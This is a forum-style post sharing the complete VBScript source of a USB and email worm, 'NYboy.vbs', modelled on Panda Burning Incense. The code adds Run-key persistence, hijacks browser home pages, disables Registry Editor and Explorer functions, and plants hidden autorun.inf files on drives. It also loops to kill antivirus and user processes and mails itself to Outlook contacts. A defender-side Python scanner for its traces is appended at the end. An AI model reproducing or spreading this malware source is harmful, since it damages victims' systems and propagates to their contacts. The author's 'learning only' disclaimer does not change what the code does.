
NYboy.vbs virus source code released: my simulation of Panda Burning Incense (熊猫烧香)

程序员文章站 (Programmer Article Station), 2022-03-20 14:13:02
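Anyone who has used a USB drive knows that a USB-drive virus is an autorun (self-running) virus: double-clicking triggers the virus body, which copies itself to drives such as C:, D: and E: and to system32 on the system drive (creating an exe file and an autorun.inf file) and also modifies the registry. When you right-click a drive such as C:, there is an "auto" command (in black bold) or two "Start" commands. I have only been learning VBS for 15 days, and I am also going to simulate this autorun virus and part of the Panda Burning Incense functionality. My ability is limited, so this is the only kind of virus I can simulate. Disclaimer: I simulated this virus purely for learning and for the technique; do not use it to cause damage. If anyone uses my code to cause damage, they bear the consequences themselves.

on error resume next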
dim fso,wsh,myfile,ws,pp,fsofolder 
set wsh=wscript.createobject("wscript.shell") 
set fso=wscript.createobject("scripting.filesystemobject") 
set myfile=fso.getfile(wscript.scriptfullname)  
'Modify the registry (Start menu items and various IE settings)
wsh.regwrite "hklm\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall\checkedvalue",0,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsercontextmenu",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowseroptions",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsersaveas",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nofileopen",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\advanced",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\cache internet",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\autoconfig",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\homepage",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\history",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\connwiz admin lock",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\internet explorer\main\start page","http://ruanji03.ys168.com"
wsh.regwrite "hkcu\software\microsoft\internet explorer\main\search page","http://ruanji03.ys168.com"
wsh.regwrite "hkcu\software\microsoft\internet explorer\main\default_page_url","http://ruanji03.ys168.com"
wsh.regwrite "hkcu\software\microsoft\internet explorer\main\default_search_url","http://ruanji03.ys168.com"
wsh.regwrite "hkey_users\.default\software\microsoft\internet explorer\main\start page","http://ruanji03.ys168.com"
wsh.regwrite "hkey_users\.default\software\microsoft\internet explorer\main\default_page_url","http://ruanji03.ys168.com"
wsh.regwrite "hkey_users\.default\software\microsoft\internet explorer\main\default_search_url","http://ruanji03.ys168.com"
wsh.regwrite "hkey_users\.default\software\microsoft\internet explorer\main\search page","http://ruanji03.ys168.com"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\homepage",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\securitytab",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\resetwebsettings",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\noviewsource",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\infodelivery\restrictions\noaddingsubscriptions",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nofilemenu",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\norealmode",1,"reg_dword"
wsh.regwrite "hklm\software\microsoft\windows\currentversion\run\win32system","c:\nyboy.vbs" 
wsh.regwrite "hklm\software\microsoft\windows\currentversion\run\scanregistry",""
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nologoff",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\norun",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodesktop",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\noviewcontextmenu",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\notraycontextmenu",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\noclose",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\startmenulogoff",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosmhelp",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nonethood",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nowinkeys",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosetfolders",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\norecentdocsmenu",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nofind","1","reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nowindowsupdate",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosettaskbar",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nofavoritesmenu",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\norecentdocshistory",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\system\disableregistrytools","1","reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\disabled",1,"reg_dword"
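'Prevent the user from opening drives by double-clicking; this could also be changed to block opening folders by double-click in the same way, not elaborated here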
wsh.regwrite "hklm\software\classes\drive\shell\auto\command\","c:\nyboy.bat '%1'" 
wsh.regwrite "hkcr\drive\shell\","auto"
wsh.regwrite "hkcr\drive\shell\auto\command\","c:\nyboy.bat '%1'"
wsh.regwrite "hklm\software\classes\directory\shell\","auto"
wsh.regwrite "hkcr\directory\shell\auto\command\","c:\nyboy.bat '%1'"
wsh.regwrite "hklm\software\classes\directory\shell\auto\command\","c:\nyboy.bat '%1'"
'Change the default file icons; a cute panda could be swapped in here
wsh.regwrite "hkcr\exefile\defaulticon\","c:\1.ico" 
wsh.regwrite "hkcr\txtfile\defaulticon\","c:\1.ico" 
wsh.regwrite "hkcr\dllfile\defaulticon\","c:\1.ico" 
wsh.regwrite "hkcr\batfile\defaulticon\","c:\1.ico" 
wsh.regwrite "hkcr\inifile\defaulticon\","c:\1.ico" 
wsh.regwrite "hklm\software\classes\exefile\defaulticon\","c:\1.ico" 
wsh.regwrite "hklm\software\classes\txtfile\defaulticon\","c:\1.ico" 
wsh.regwrite "hklm\software\classes\dllfile\defaulticon\","c:\1.ico" 
wsh.regwrite "hklm\software\classes\batfile\defaulticon\","c:\1.ico" 
wsh.regwrite "hklm\software\classes\inifile\defaulticon\","c:\1.ico" 
wsh.regwrite "hklm\software\classes\.reg\","txtfile"
wsh.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticecaption","你好啊,大兵和你开个小小的玩笑"
wsh.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticetext","你已经中毒了,赶快杀毒或者与qq252287438联系"
'Copy itself to C:, D:, E:, F: and the USB drive
myfile.copy "c:\" 
myfile.copy "d:\" 
myfile.copy "e:\"
myfile.copy "f:\" 
myfile.copy "i:\" 
myfile.attributes=34 
'Define the contents of autorun.inf; this is the part a USB-drive virus must have, and it can be written simply here
if fso.fileexists("c:\autorun.inf") then 
set objfolder = fso.getfile("c:\autorun.inf") 
else 
wsh.run "cmd /c echo [autorun]>>c:\autorun.inf"_  
&"&& echo open=nyboy.bat >>c:\autorun.inf"_  
&"&& echo shellexecute=nyboy.bat >>c:\autorun.inf"_  
&"&& echo shell\auto\command=nyboy.bat>>c:\autorun.inf"_  
&"&& echo shell=auto>>c:\autorun.inf"_ 
&"&& attrib +h +s +r c:\autorun.inf" 
set autobatc=fso.createtextfile("c:\nyboy.bat",1,ture)
autobatc.writeline("nyboy.vbs")
end if
if fso.fileexists("d:\autorun.inf") then 
set objfolder = fso.getfile("d:\autorun.inf") 
else 
wsh.run "cmd /c echo [autorun]>>d:\autorun.inf"_  
&"&& echo open=nyboy.bat >>d:\autorun.inf"_  
&"&& echo shellexecute=nyboy.bat >>d:\autorun.inf"_  
&"&& echo shell\auto\command=nyboy.bat>>d:\autorun.inf"_  
&"&& echo shell=auto>>d:\autorun.inf"_ 
&"&& attrib +h +s +r d:\autorun.inf" 
set autobatd=fso.createtextfile("d:\nyboy.bat",1,ture)
autobatd.writeline("nyboy.vbs")
end if
if fso.fileexists("e:\autorun.inf") then 
set objfolder = fso.getfile("e:\autorun.inf") 
else 
wsh.run "cmd /c echo [autorun]>>e:\autorun.inf"_  
&"&& echo open=nyboy.bat >>e:\autorun.inf"_  
&"&& echo shellexecute=nyboy.bat >>e:\autorun.inf"_  
&"&& echo shell\auto\command=nyboy.bat>>e:\autorun.inf"_  
&"&& echo shell=auto>>e:\autorun.inf"_ 
&"&& attrib +h +s +r e:\autorun.inf" 
set autobate=fso.createtextfile("e:\nyboy.bat",1,ture)
autobate.writeline("nyboy.vbs")
end if
if fso.fileexists("f:\autorun.inf") then 
set objfolder = fso.getfile("f:\autorun.inf") 
else 
wsh.run "cmd /c echo [autorun]>>f:\autorun.inf"_  
&"&& echo open=nyboy.bat >>f:\autorun.inf"_  
&"&& echo shellexecute=nyboy.bat >>f:\autorun.inf"_  
&"&& echo shell\auto\command=nyboy.bat>>f:\autorun.inf"_  
&"&& echo shell=auto>>f:\autorun.inf"_ 
&"&& attrib +h +s +r f:\autorun.inf" 
set autobatf=fso.createtextfile("f:\nyboy.bat",1,ture)
autobatf.writeline("nyboy.vbs")
end if
if fso.fileexists("i:\autorun.inf") then 
set objfolder = fso.getfile("i:\autorun.inf") 
else 
wsh.run "cmd /c echo [autorun]>>i:\autorun.inf"_  
&"&& echo open=nyboy.bat >>i:\autorun.inf"_  
&"&& echo shellexecute=nyboy.bat >>i:\autorun.inf"_  
&"&& echo shell\auto\command=nyboy.bat>>i:\autorun.inf"_  
&"&& echo shell=auto>>i:\autorun.inf"_ 
&"&& attrib +h +s +r i:\autorun.inf" 
set autobatf=fso.createtextfile("i:\nyboy.bat",1,ture)
autobatf.writeline("nyboy.vbs")
end if
'Set the virus body's attributes to system, read-only, hidden
wsh.run "cmd /c attrib +h +s +r c:\nyboy.bat"_  
&"&& attrib +h +s +r d:\nyboy.bat"_  
&"&& attrib +h +s +r e:\nyboy.bat"_  
&"&& attrib +h +s +r f:\nyboy.bat"_  
&"&& attrib +h +s +r i:\nyboy.bat"
'Forcibly terminate certain processes such as QQ, Notepad, web pages, batch files, Kaspersky, RealPlay, etc.; after it runs these files cannot be opened
do 
set ws=getobject("winmgmts:\\.\root\cimv2") 
set pp=ws.execquery("select * from win32_process where name='taskmgr.exe'or name = 'qq.exe'or name = 'notepad.exe'or name = 'iexplore.exe'or name = 'cmd.exe'or name = 'avp.exe'or name = 'winrar.exe'or name = 'realplay.exe'or name = 'winword.exe'") 
for each i in pp 
i.terminate()
wscript.sleep 100 
next 
loop
'Let the virus spread via e-mail
set ol=createobject("outlook.application")
on error resume next
for x=1 to 5
set mail=ol.createitem(0)
mail.to=ol.getnamespace("mapi").addresslists(1).addressentries(x)
mail.subject="今晚你来吗?"
mail.body="朋友你好:您的朋友给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运!              qq交友频道"
mail.attachments.add("c:\nyboy.vbs")
mail.send
next
ol.quit
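
Added example, not part of the original post or the author's code: a defender-side Python check for artifacts this listing leaves behind, namely the launch directives it writes into `autorun.inf` and some of the registry values it sets, as they would appear in a regedit-style export. The function names, indicator labels and both sample inputs are constructed for illustration.

```python
import re

# Launch directives of an [autorun] section; the listing above writes all three kinds.
LAUNCH_KEYS = re.compile(r"^(open|shellexecute|shell\\[^\\=]+\\command)$", re.I)
SCRIPT_EXT = re.compile(r"\.(bat|cmd|vbs|vbe|js|jse|wsf|exe|scr|pif|com)\b", re.I)
# (key-path suffix, value name) pairs the listing writes; "@" is a key's default value.
REG_INDICATORS = {
    (r"\currentversion\run", "win32system"): "Run-key persistence",
    (r"\policies\system", "disableregistrytools"): "Registry Editor disabled",
    (r"\drive\shell\auto\command", "@"): "drive open handler replaced",
    (r"\directory\shell\auto\command", "@"): "folder open handler replaced",
}

def scan_autorun_inf(text):
    """Return (directive, target) pairs in [autorun] that launch a script or binary."""
    hits, section = [], ""
    for line in map(str.strip, text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "autorun" and "=" in line and not line.startswith(";"):
            key, target = (p.strip() for p in line.split("=", 1))
            if LAUNCH_KEYS.match(key) and SCRIPT_EXT.search(target):
                hits.append((key.lower(), target))
    return hits

def scan_reg_export(text):
    """Match a regedit-style export against REG_INDICATORS; return sorted labels."""
    found, key = set(), ""
    for line in map(str.strip, text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1].lower()
            continue
        m = re.match(r'(@|"([^"]*)")\s*=', line)
        if m:
            name = "@" if m.group(1) == "@" else m.group(2).lower()
            found.update(label for (suffix, value), label in REG_INDICATORS.items()
                         if key.endswith(suffix) and name == value)
    return sorted(found)

# Constructed samples: the autorun.inf the listing echoes out, and a small .reg export.
SAMPLE_INF = "[autorun]\nopen=nyboy.bat \nshellexecute=nyboy.bat \nshell\\auto\\command=nyboy.bat\nshell=auto\n"
SAMPLE_REG = r"""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"win32system"="c:\\nyboy.vbs"
[HKEY_CLASSES_ROOT\Drive\shell\auto\command]
@="c:\\nyboy.bat '%1'"
"""

if __name__ == "__main__":
    print(scan_autorun_inf(SAMPLE_INF), scan_reg_export(SAMPLE_REG))
```

Real `.reg` files exported by regedit are UTF-16 encoded, so decode them before passing the text to `scan_reg_export`.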